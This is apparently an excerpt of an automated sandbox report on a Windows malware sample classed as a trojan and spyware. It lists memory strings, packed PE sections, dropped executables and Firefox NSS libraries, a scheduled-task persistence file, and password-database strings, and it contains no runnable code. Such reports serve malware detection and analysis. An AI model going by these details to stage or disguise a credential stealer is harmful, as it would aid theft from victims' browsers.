Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, KJDAECAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, KJDAECAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, KJDAECAE.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KJDAECAE.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, KJDAECAE.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://support.mozilla.org
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: KJDAECAE.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: KJDAECAE.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/KoBtErivXexPAjSpGY.exe
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/BtErivXexPAjSpGY.exe
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: Zachv5lCuu.exe, 00000000.00000003.1445026722.000000002F91A000.00000004.00000020.00020000.00000000.sdmp, HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Zachv5lCuu.exe, 00000000.00000003.1445026722.000000002F91A000.00000004.00000020.00020000.00000000.sdmp, HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary
barindex
PE file contains section with special chars
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name:
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: .idata
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: .idata
Source: explorti.exe.9.dr Static PE information: section name:
PE file has nameless sections
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CD0B700
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CD0B8C0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CD0B910
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CCAF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA35A0 0_2_6CCA35A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB64C0 0_2_6CCB64C0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCD4D0 0_2_6CCCD4D0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAD4E0 0_2_6CCAD4E0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE6CF0 0_2_6CCE6CF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB6C80 0_2_6CCB6C80
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD034A0 0_2_6CD034A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0C4A0 0_2_6CD0C4A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB5440 0_2_6CCB5440
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1545C 0_2_6CD1545C
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1AC00 0_2_6CD1AC00
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE5C10 0_2_6CCE5C10
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF2C10 0_2_6CCF2C10
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1542B 0_2_6CD1542B
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE0DD0 0_2_6CCE0DD0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD085F0 0_2_6CD085F0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBFD00 0_2_6CCBFD00
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCED10 0_2_6CCCED10
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCD0512 0_2_6CCD0512
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD176E3 0_2_6CD176E3
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCABEF0 0_2_6CCABEF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBFEF0 0_2_6CCBFEF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0E680 0_2_6CD0E680
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC5E90 0_2_6CCC5E90
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD04EA0 0_2_6CD04EA0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF2E4E 0_2_6CCF2E4E
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC4640 0_2_6CCC4640
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC9E50 0_2_6CCC9E50
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE3E50 0_2_6CCE3E50
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD16E63 0_2_6CD16E63
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAC670 0_2_6CCAC670
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF5600 0_2_6CCF5600
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE7E10 0_2_6CCE7E10
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD09E30 0_2_6CD09E30
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCADFE0 0_2_6CCADFE0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCD6FF0 0_2_6CCD6FF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF77A0 0_2_6CCF77A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB9F00 0_2_6CCB9F00
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE7710 0_2_6CCE7710
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD150C7 0_2_6CD150C7
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCC0E0 0_2_6CCCC0E0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE58E0 0_2_6CCE58E0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCD60A0 0_2_6CCD60A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC8850 0_2_6CCC8850
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCD850 0_2_6CCCD850
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCEF070 0_2_6CCEF070
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB7810 0_2_6CCB7810
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCEB820 0_2_6CCEB820
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF4820 0_2_6CCF4820
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD02990 0_2_6CD02990
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE5190 0_2_6CCE5190
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAC9A0 0_2_6CCAC9A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDD9B0 0_2_6CCDD9B0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCA940 0_2_6CCCA940
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1B170 0_2_6CD1B170
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBD960 0_2_6CCBD960
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCFB970 0_2_6CCFB970
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE8AC0 0_2_6CCE8AC0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC1AF0 0_2_6CCC1AF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCEE2F0 0_2_6CCEE2F0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1BA90 0_2_6CD1BA90
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD12AB0 0_2_6CD12AB0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA22A0 0_2_6CCA22A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCD4AA0 0_2_6CCD4AA0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBCAB0 0_2_6CCBCAB0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE9A60 0_2_6CCE9A60
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD153C8 0_2_6CD153C8
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAF380 0_2_6CCAF380
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA5340 0_2_6CCA5340
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBC370 0_2_6CCBC370
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCED320 0_2_6CCED320
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00BFE410 11_2_00BFE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00BF4CD0 11_2_00BF4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C33048 11_2_00C33048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C27D63 11_2_00C27D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C36EE9 11_2_00C36EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00BF4AD0 11_2_00BF4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C3763B 11_2_00C3763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C32BB0 11_2_00C32BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C3775B 11_2_00C3775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C38700 11_2_00C38700
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960000 13_2_7F960000
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960850 13_2_7F960850
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: String function: 6CCE94D0 appears 90 times
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: String function: 6CCDCBE8 appears 134 times
Sample file is different than original file name gathered from version info
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002137000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs Zachv5lCuu.exe
Source: Zachv5lCuu.exe, 00000000.00000002.1548910750.000000006CF25000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Zachv5lCuu.exe
Source: Zachv5lCuu.exe, 00000000.00000002.1541500166.000000006CD32000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Zachv5lCuu.exe
Uses 32bit PE files
Source: Zachv5lCuu.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Zachv5lCuu.exe Static PE information: Section: ZLIB complexity 0.9996189024390244
Source: Zachv5lCuu.exe Static PE information: Section: ZLIB complexity 0.99371337890625
Source: Zachv5lCuu.exe Static PE information: Section: ZLIB complexity 0.9896240234375
Source: GHCGDAFCFH.exe.0.dr Static PE information: Section: ZLIB complexity 0.9980895662568307
Source: GHCGDAFCFH.exe.0.dr Static PE information: Section: vtxlewez ZLIB complexity 0.9944682116953762
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9980895662568307
Source: amadka[1].exe.0.dr Static PE information: Section: vtxlewez ZLIB complexity 0.9944682116953762
Source: explorti.exe.9.dr Static PE information: Section: ZLIB complexity 0.9980895662568307
Source: explorti.exe.9.dr Static PE information: Section: vtxlewez ZLIB complexity 0.9944682116953762
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.9996189024390244
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.99371337890625
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.9896240234375
Source: 25bb638aac.exe.11.dr Static PE information: Section: ZLIB complexity 0.9996189024390244
Source: 25bb638aac.exe.11.dr Static PE information: Section: ZLIB complexity 0.99371337890625
Source: 25bb638aac.exe.11.dr Static PE information: Section: ZLIB complexity 0.9896240234375
Source: GHCGDAFCFH.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: explorti.exe.9.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: amadka[1].exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/29@0/3
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CD07030
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Zachv5lCuu.exe, 00000000.00000003.1368780238.0000000023644000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000003.1382565021.0000000023636000.00000004.00000020.00020000.00000000.sdmp, KFIJEGCBGIDGHIDHDGCB.0.dr, JEGDGIIJJECFIDHJJKKF.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1539958795.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: Zachv5lCuu.exe ReversingLabs: Detection: 55%
Source: GHCGDAFCFH.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
